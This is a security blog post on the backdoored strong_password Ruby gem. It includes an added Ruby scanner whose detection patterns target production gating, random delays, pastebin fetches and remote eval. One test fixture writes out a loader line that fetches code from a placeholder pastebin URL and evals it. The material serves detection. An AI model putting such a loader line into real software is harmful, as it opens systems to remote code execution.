
Secplicity - Security Simplified

Powered by WatchGuard Technologies

Ruby’s strong_password Gem Backdoored

July 8, 2019 By Emil Hozan

Just recently I wrote about how a security-aware software developer was spear-phished and almost fell victim to a Firefox 0-day exploit. Fortunately for him, he was using Google Chrome rather than Firefox. Follow that link for more details on that story; what that story and this one share is a security checklist that both parties upheld.


With new software releases and developments, oftentimes you’ll also see a changelog of some sort. Changelogs describe the alterations a new release contains compared to prior versions. Reviewing these changelogs is important for many reasons, one of which is being aware of what has changed and whether those changes could affect you, your product, or your company. So far so good: documenting changes is good practice and gives fair disclosure of what changed.

Now, this simple task, which many can perform even without fully understanding every change and its wording, provides the context needed to research further and to collaborate with others in assessing potential impacts. This habit also leads to the focal point of this blog: following breadcrumbs led to the discovery of a hijacked Ruby gem named strong_password. Ruby is a programming language and a gem is a Ruby module or library; strong_password is a gem that checks password strength.


In brief, this maliciously released “update” to the gem first tests whether strong_password is being used in production. If so, and after a random delay, the code reaches out to a pastebin.com listing and retrieves a second payload. That second payload silently opens a backdoor that allows an attacker to execute code remotely. It also sends a list of infected URLs to a separate domain.
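The behaviour just described (a production-only gate, a randomised delay, a fetch from pastebin.com, and execution of the fetched content) can be turned into a simple triage check. The following is an added example, not code from the article or from the strong_password project: a small static scanner that flags Ruby files in an installed gem directory showing those indicators. The indicator names, the risk scoring, and the two sample files are constructed for illustration.

```ruby
require 'find'
require 'tmpdir'

# Constructed indicator patterns, one per behaviour described in the article.
INDICATORS = {
  production_gate: /Rails\.env\.production\?|RAILS_ENV.{0,10}production/,
  random_delay:    /sleep\s*\(?\s*rand/,
  pastebin_fetch:  /pastebin\.com/i,
  remote_eval:     /\beval\s*\(?\s*(Net::HTTP|open|URI|Base64)/
}.freeze

# Returns the names of the indicators present in one file's source text.
def suspicious_indicators(source)
  INDICATORS.select { |_name, re| source.match?(re) }.keys
end

# :high only when remote eval is paired with a trigger or a pastebin fetch;
# a lone indicator (e.g. a production check) is normal in many gems.
def risk_level(indicators)
  if indicators.include?(:remote_eval) &&
     (indicators & %i[pastebin_fetch production_gate random_delay]).any?
    :high
  elsif indicators.size >= 2 then :medium
  elsif indicators.empty?   then :clean
  else :low
  end
end

# Walks a gem directory (e.g. one under `gem env gemdir`) and reports
# each .rb file that matches at least one indicator.
def scan_gem_dir(dir)
  findings = {}
  Find.find(dir) do |path|
    next unless path.end_with?('.rb')
    ind = suspicious_indicators(File.read(path))
    findings[path] = { indicators: ind, risk: risk_level(ind) } unless ind.empty?
  end
  findings
end

# Constructed fixtures: a harmless checker and a file shaped like the
# described backdoor. They are only scanned as text, never executed.
BENIGN = "module StrongPassword\n  def score(pw); pw.length * 4; end\nend\n"
BACKDOORED = <<~RUBY
  if Rails.env.production?
    Thread.new { sleep rand(3600); eval(Net::HTTP.get(URI('https://pastebin.com/raw/PLACEHOLDER'))) }
  end
RUBY

if __FILE__ == $PROGRAM_NAME
  Dir.mktmpdir do |d|
    File.write(File.join(d, 'strength.rb'), BENIGN)
    File.write(File.join(d, 'loader.rb'), BACKDOORED)
    scan_gem_dir(d).each { |f, r| puts "#{File.basename(f)}: #{r[:risk]} #{r[:indicators].inspect}" }
  end
end
```

Point `scan_gem_dir` at the installed gem's directory to review it before deployment; a :high finding is a prompt for manual code review and a diff against the previous release, not proof of compromise on its own.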


This author’s due diligence led Ruby’s security team to investigate further, ending with the nefarious gem release being pulled. That said, if you use Ruby and depend on the strong_password gem, update it right away. Consider investigating internally for any possible infiltration and reviewing your intrusion detection logs. The gem was downloaded fewer than 600 times; I can only assume that those impacted are still conducting their investigations.

As for others not directly impacted, and to broaden this message to other readers, consider taking the same steps with future releases of all software-based products. This includes Ruby and other programming languages, and even the OS release notes for various hardware products.

Filed Under: Editorial Articles Tagged With: Ruby on Rails, software vulnerability